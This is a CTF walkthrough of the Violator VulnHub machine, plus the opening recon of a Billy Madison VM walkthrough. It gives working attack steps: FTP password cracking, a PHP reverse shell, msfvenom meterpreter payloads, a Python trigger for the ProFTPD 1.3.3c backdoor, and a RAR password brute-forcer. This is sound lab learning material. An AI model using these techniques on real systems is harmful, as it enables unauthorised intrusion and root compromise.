[DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.110.183   login: dg   password: policyoftruth
[21][ftp] host: 192.168.110.183   login: mg   password: bluedress
[21][ftp] host: 192.168.110.183   login: af   password: enjoythesilence
[21][ftp] host: 192.168.110.183   login: aw   password: sweetestperfection
1 of 1 target successfully completed, 4 valid passwords found

Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/dg" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x  10 root     root         4096 Jun  6 20:31 bd
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 af       af           4096 Jun 12 09:25 af
drwxr-xr-x   2 aw       aw           4096 Jun 12 09:25 aw
drwxr-xr-x   4 dg       dg           4096 Jun 14 18:55 dg
drwxr-xr-x   2 mg       mg           4096 Jun 12 09:28 mg

I pull down various files for inspection locally.

ftp> get minarke-1.21.tar.bz2
local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2
200 PORT command successful
150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes)
226 Transfer complete
15576 bytes received in 0.01 secs (2.7953 MB/s)

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 aw       aw             59 Jun 12 09:19 hint
226 Transfer complete
ftp> get hint
local: hint remote: hint

150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 mg       mg            112 Jun 12 09:28 faith_and_devotion
226 Transfer complete
ftp> get faith_and_devotion
local: faith_and_devotion remote: faith_and_devotion
200 PORT command successful
150 Opening BINARY mode data connection for faith_and_devotion (112 bytes)
226 Transfer complete

The bd directory in dg’s home has a more extensive listing (bin, etc, lib, sbin and so on, like a self-contained install tree) which we’ll have to come back to later.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 bin
drwxr-xr-x   2 root     root         4096 Jun  6 20:46 etc
drwxr-xr-x   3 root     root         4096 Jun  6 20:31 include
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 lib
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 libexec
drwxr-xr-x   2 root     root         4096 Jun  6 20:31 sbin
drwxr-xr-x   4 root     root         4096 Jun  6 20:31 share
drwxr-xr-x   2 root     root         4096 Jun  6 22:17 var

Taking a look at our loot, the hint file is a bit vague…for now…

root@mrb3n:~/violator# cat hint
You are getting close... Can you crack the final enigma..?

The Minarke archive is interesting: a C file and makefile for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.

root@mrb3n:~/violator/minarke-1.21# cat minarke.c 
/* Minarke, an Enigma M4 emulator
 *
 * Written by John Gilbert
 * Version 1.21
 * (c) 2008

I compile it and check out the binary. Our suspicions are confirmed: this can be used to crack some Enigma code. Pretty awesome. Now let’s find that code!

root@mrb3n:~/violator/minarke-1.21# make
gcc -g -Wall -o minarke minarke.c
root@mrb3n:~/violator/minarke-1.21# ./minarke 


Minarke, an Enigma M4 emulator
by John Gilbert

Emulates the Kriegsmarine M4 Enigma encryption machine

	Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.

	Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help

see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html


Rotors: 

The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.

root@mrb3n:~/violator# cat faith_and_devotion 
Lyrics:

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

Now I need a shell. Since /var/www/html appears to be writable, I attempt to upload a PHP reverse shell. If all goes well and knightmare doesn’t have any tricks up his sleeve I should be able to grab a nice reverse shell.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): dg
331 Password required for dg
Password:
230 User dg logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /var/www/html
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
226 Transfer complete
ftp> put /var/www/html/violator.php 
local: /var/www/html/violator.php remote: /var/www/html/violator.php
200 PORT command successful
150 Opening BINARY mode data connection for /var/www/html/violator.php
226 Transfer complete
3463 bytes sent in 0.00 secs (33.0257 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 dg       dg          51256 Jun  6 20:00 foggie.jpg
-rw-r--r--   1 proftpd  nogroup       699 Sep 16 17:39 group
-rw-rw-r--   1 dg       dg            318 Jun 12 17:26 index.html
-rw-r--r--   1 proftpd  nogroup      1330 Sep 16 15:24 passwd
-rw-r--r--   1 dg       dg           3463 Sep 16 18:18 violator.php
226 Transfer complete

I browse to my violator.php reverse shell script and sure enough get a connection as www-data.

root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php

root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 19:20:09 up  3:00,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$ 

I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudo group. Interesting: he can run another copy of proftpd as root, without a password, which is what we saw earlier in the bd directory in his home.

www-data@violator:/$ su dg
su dg
Password: policyoftruth

dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd
file proftpd
proftpd: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped

dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
 - setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer

We now have another service running locally on port 2121. How can this be abused to gain root privs?

dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:2121          0.0.0.0:*               LISTEN      -               
tcp        0    218 192.168.110.183:33641   192.168.110.179:443     ESTABLISHED 1391/bash       
tcp6       0      0 :::21                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 192.168.110.183:80      192.168.110.179:56414   ESTABLISHED -               
tcp6       0      0 192.168.110.183:21      192.168.110.179:56886   ESTABLISHED -

Connecting to port 2121 locally, I see we are dealing with ProFTPD 1.3.3c.

dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121
telnet 127.0.0.1 2121
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]

This particular ProFTPD version has a known backdoor command execution vulnerability (the 1.3.3c source tarball distributed in late 2010 had been trojaned), which hopefully we can use to escalate privileges since the daemon was started with sudo. There are many ways to do this; the way I did it worked, but of course there are other options.

root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root  | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution        | ./linux/remote/16921.rb
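What the Metasploit module below actually sends is small enough to do by hand, and it is worth seeing because it explains why a plain TCP relay to 127.0.0.1:2121 is all the exploit needs. This is an added example, not part of the original write-up or of Metasploit: the trojaned build watched for the HELP command with the argument ACIDBICHES and then handed the control connection over to a root shell, so the client sends that line followed by a shell command. The server here is a constructed stand-in that returns canned output for `id` instead of executing anything; the banner text is made up apart from the version string.

```python
import socket
import socketserver
import threading

MAGIC = b"HELP ACIDBICHES"          # the trigger the trojaned 1.3.3c build looked for


class FakeBackdooredProFTPD(socketserver.StreamRequestHandler):
    """Constructed stand-in for the trojaned 1.3.3c daemon. Until it sees the
    magic HELP argument it behaves like an FTP server wanting a login; after it,
    the next line is treated as a shell command. The real backdoor ran it as
    root; this fake only returns canned output and never executes anything."""

    def handle(self):
        self.wfile.write(b"220 ProFTPD 1.3.3c Server (constructed fake) [127.0.0.1]\r\n")
        for raw in self.rfile:
            line = raw.strip()
            if line == MAGIC:
                break                       # the real backdoor sends no FTP reply here
            if line.upper() == b"QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            self.wfile.write(b"530 Please login with USER and PASS\r\n")
        else:
            return                          # client hung up before the trigger
        cmd = self.rfile.readline().strip()
        if cmd == b"id":
            self.wfile.write(b"uid=0(root) gid=0(root) groups=0(root),65534(nogroup)\n")
        else:
            self.wfile.write(b"sh: 1: " + cmd + b": not found\n")


def trigger_backdoor(host, port, command, timeout=3):
    """Open the control channel, send the magic HELP argument, then one shell
    line, and collect whatever comes back until the peer closes or goes quiet.
    Returns (banner, output)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(4096).decode(errors="replace").strip()
        s.sendall(MAGIC + b"\r\n")
        s.sendall(command.encode() + b"\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass                            # a live root shell does not hang up
    return banner, b"".join(chunks).decode(errors="replace")


def demo(command="id"):
    """Run the trigger against the in-process fake; returns (banner, output)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeBackdooredProFTPD)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return trigger_backdoor(*srv.server_address, command)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    banner, output = demo("id")
    print(banner)
    print(output, end="")
```

With the meterpreter relay from later in the write-up in place, trigger_backdoor("127.0.0.1", 2121, "id") is the manual equivalent of the module’s check; swapping the command for a reverse shell one-liner is what the module does with its payload.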

It looks like I will need Metasploit to take advantage of this exploit, so I quickly create a meterpreter PHP payload, upload it to the target, execute it and grab a meterpreter shell.

root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php

I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.

Connection closed by foreign host.
dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php
< http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php      
The program 'wget' is currently not installed. You can install it by typing:
sudo apt-get install wget
dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php
curl -O http://192.168.110.179/violator_meterp.php
The program 'curl' is currently not installed. You can install it by typing:
sudo apt-get install curl

SCP was still installed so I was able to transfer the file that way, as root, which is super secure!

dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php .
<scp root@192.168.110.179:/var/www/html/violator_meterp.php .                
root@192.168.110.179's password: 🙂

violator_meterp.php                           100%   26KB  25.6KB/s   00:00 

Don’t forget to chown the file as dg so we can catch a session as this user.

dg@violator:/var/www/html$ chown dg:dg violator_meterp.php

Quickly set up metasploit to catch our shiny new meterpreter shell.

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.110.179
lhost => 192.168.110.179
msf exploit(handler) > set lport 8443
lport => 8443

Executing the shell I gain a connection and it’s time to set up some port forwarding so I can attack remote port 2121 directly.

dg@violator:/var/www/html$ php violator_meterp.php


msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.110.179:8443 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400

I use the built-in meterpreter portfwd command to set up the tcp relay.

meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121

Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.

msf exploit(handler) > search ProFTPD

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl
msf payload(reverse_perl) > show options 

Module options (payload/cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf payload(reverse_perl) > set LHOST 192.168.110.179
LHOST => 192.168.110.179
msf payload(reverse_perl) > exploit
[-] Unknown command: exploit.
msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179
LHOST => 192.168.110.179

I run the exploit and pop a root shell.

msf exploit(proftpd_133c_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.110.179:4444 
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#

Checking for our flag, it was, as I expected, a troll 🙂

root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.

The hidden directory ‘.basildon’ in root’s home directory contains a file, crocs.rar.

root@violator:/root# ls -lah
ls -lah
total 24K
drwx------  3 root root 4.0K Jun 14 19:56 .
drwxr-xr-x 22 root root 4.0K Jun 14 19:44 ..
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
d--x------  2 root root 4.0K Jun 14 19:57 .basildon
-rw-r--r--  1 root root  114 Jun 12 10:22 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
root@violator:/root# cd .basildon
cd .basildon
root@violator:/root/.basildon# ls -lah
ls -lah
total 148K
d--x------ 2 root root 4.0K Jun 14 19:57 .
drwx------ 3 root root 4.0K Jun 14 19:56 ..
-rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar

I move the file over to the web root and pull it down locally for analysis.

root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  137k  100  137k    0     0  20.6M      0 --:--:-- --:--:-- --:--:-- 22.3M

root@mrb3n:~/violator# file crocs.rar 
crocs.rar: RAR archive data, v1d, os: Win32

root@mrb3n:~/violator# unrar e crocs.rar

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Extracting from crocs.rar

Enter password (will not be echoed) for artwork.jpg: 

Hmm, a password-protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a wordlist based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.

#!/usr/bin/env python3
# Brute force a password-protected RAR with a wordlist.
# Needs the rarfile module (pip install rarfile) and the unrar binary on PATH.
import sys
import rarfile


def crack(archive, wordlist):
    rf = rarfile.RarFile(archive)
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            password = line.rstrip("\n")   # keep inner spaces: the winner has them
            if not password:
                continue
            try:
                rf.extractall(pwd=password)   # rarfile raises on a wrong password
            except rarfile.Error:
                continue
            return password
    return None


if __name__ == "__main__":
    archive = sys.argv[1] if len(sys.argv) > 1 else "crocs.rar"
    wordlist = sys.argv[2] if len(sys.argv) > 2 else "violator_songs"
    print("Rar file password brute forcer\n")
    found = crack(archive, wordlist)
    if found:
        print("Correct Password = " + found + "\n")
    else:
        print("No password in the list matched")

Our password, and the artwork.jpg file!

root@mrb3n:~/violator# python rarcracker.py 

Rar file password brute forcer

Correct Password = World in My Eyes

This time exiftool gave us something juicy, which I believe is our Enigma code.

root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg 
ExifTool Version Number         : 10.07
File Name                       : artwork.jpg
Directory                       : .
File Size                       : 183 kB
File Modification Date/Time     : 2016:06:12 14:38:12-04:00
File Access Date/Time           : 2016:09:16 21:03:34-04:00
File Creation Date/Time         : 2016:06:12 14:38:12-04:00
File Permissions                : rw-rw-rw-
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : Violator
Software                        : Google
Artist                          : Dave Gaham
Copyright                       : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version                    : 0220
Date/Time Original              : 1990:03:19 22:13:30
Create Date                     : 1990:03:19 22:13:30
Sub Sec Time Original           : 04
Sub Sec Time Digitized          : 04
Exif Image Width                : 1450
Exif Image Height               : 1450
XP Title                        : Violator
XP Author                       : Dave Gaham
XP Keywords                     : created by user dg
XP Subject                      : policyoftruth
Padding                         : (Binary data 1590 bytes, use -b option to extract)
About                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator                         : Dave Gaham
Subject                         : created by user dg
Title                           : Violator
Description                     : Violator
Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired                   : 1941:05:09 10:30:18.134
Last Keyword XMP                : created by user dg
Image Width                     : 1450
Image Height                    : 1450
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1450x1450
Megapixels                      : 2.1
Create Date                     : 1990:03:19 22:13:30.04
Date/Time Original              : 1990:03:19 22:13:30.04

I was unable to get the Minarke program to work, but the following decoder handled the text for me. I just had to fix up the spacing to fully read the message.

ONE FINAL CHALLENGE FOR YOU BGHX 

CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR 
ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING  THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES 
ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR 

SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN 

KNIGHTMARE

An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board, which tells us that this is the license plate of a 1981 Ford Cortina MkV in the music video for the Depeche Mode song ‘Useless’.


Overall this one was a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and for sharing a bit of culture with us.

As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.

Until next time, enjoy the music!

Billy Madison vulnhub VM walkthrough

I was browsing Twitter one afternoon and saw that @7minsec was looking for testers for his next boot2root challenge, based on the movie Billy Madison. Since I thoroughly enjoyed his first CTF (Tommy Boy) I jumped at the opportunity.

Recon

As always, we start off with a super stealthy nmap scan.

Nmap scan report for 192.168.110.181
Host is up (0.00020s latency).
Not shown: 65526 filtered ports

PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
80/tcp   open   http        Apache httpd 2.4.18 
139/tcp  open   netbios-ssn Samba smbd 3.X 
445/tcp  open   netbios-ssn Samba smbd 3.X 
2525/tcp open   smtp

Grabbing the source of the index page on port 80 we can see that Billy’s PC has been taken over and we must unlock it and recover his final paper before time is up! I also took a look at the eric.php page, which I later found out is a troll to block directory bruteforcing with tools such as dirbuster.

root@mrb3n:~# curl -s http://192.168.110.181
<TITLE>Oh nooooooo!</TITLE>
<html>
<p>
<center><h1> UH OH!</h1></center>
<p>
<center><img src="eric-tongue-animated.gif"></center>
<p>
<center><h1>Silly Billy!!!</h1></center>
<p>
<center><h3>If you're reading this, you clicked on the link I sent you.  OH NOES!  Your computer's all locked up, and now you can't get access to your final 12th grade assignment you've been working so hard on!  You need that to graduate, Billy Boy!!</h3></center>
<p>
<center><h3>Now all I have to do is sit and wait for a while and...</h3></center>
<p>
<center><img src="hotels.gif"></center>
<p> 
<center><h2>I bet this is you right now:</h2></center>
<p>
<center><img src="billy-mad.png"><img src="billy-mad.png"><img src="billy-mad.png"></center>
<P>
<p><center><h2>Think you can get your computer unlocked and recover your final paper before time runs out and you FAAAAIIIILLLLL?????</h2></center>
<p>
<center>Good luck, schmuck.</center>
<p>
</html>

I pulled down all of the images for offline analysis as they often contain valuable information during CTFs but I did not uncover anything useful.

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/billy-mad.png
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  225k  100  225k    0     0  18.5M      0 --:--:-- --:--:-- --:--:-- 19.9M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/hotels.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  329k  100  329k    0     0  53.6M      0 --:--:-- --:--:-- --:--:-- 64.4M

root@mrb3n:~/Desktop/billymadison# curl -O http://192.168.110.181/eric-tongue-animated.gif
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  440k  100  440k    0     0  26.1M      0 --:--:-- --:--:-- --:--:-- 26.8M

Having exhausted my options on the web app for the time being I checked out what was going on with the telnet port. I was greeted with a friendly ban notice (confirmed on a re-connection attempt) as well as my first hint at a password (possibly ROT).

root@mrb3n:~/Desktop/billymadison# telnet 192.168.110.181
Trying 192.168.110.181...
Connected to 192.168.110.181.
Escape character is '^]'.
****** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
Connection closed by foreign host.

Port 69 was hosting a WordPress site. I enumerated a bit with WPScan and ultimately hit a wall. Once on the box I confirmed that this was an intentional honeypot by the author.

root@mrb3n:~# wpscan --url http://192.168.110.181:69 --enumerate u
WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
y
[+] URL: http://192.168.110.181:69/
[+] Started: Thu Aug 25 11:33:21 2016

[!] The WordPress 'http://192.168.110.181:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.110.181:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Location: http://192.168.110.181:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.110.181:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.110.181:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.110.181:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.110.181:69/static/wp-content/themes/twentyeleven/style.css
 |  Description: 

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[!] Stop User Enumeration plugin detected, results might be empty. However a bypass exists for v1.2.8 and below, see stop_user_enumeration_bypass.rb in /usr/share/wpscan
[+] We did not enumerate any usernames

[+] Finished: Thu Aug 25 11:33:22 2016
[+] Requests Done: 62
[+] Memory used: 7.863 MB
[+] Elapsed time: 00:00:00

Next I fired up enum4linux to see what I could uncover on our SMB port. The scan returned an open share (with anonymous access) as well as 3 local users.

root@mrb3n:~/Desktop/billymadison# enum4linux -a 192.168.110.181
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 25 11:23:27 2016

 ============================================ 
|    Share Enumeration on 192.168.110.181    |
 ============================================ 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

	Sharename       Type      Comment
	---------       ----      -------
	EricsSecretStuff Disk      
	IPC$            IPC       IPC Service (BM)

	Server               Comment
	---------            -------
	BM                   BM

	Workgroup            Master
	---------            -------
	WORKGROUP            BM

[+] Attempting to map shares on 192.168.110.181
//192.168.110.181/EricsSecretStuff	Mapping: OK, Listing: OK
//192.168.110.181/IPC$	Mapping: OK	Listing: DENIED


========================================================================== 
|    Users on 192.168.110.181 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-4111762292-2429122530-3796655328
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ' '

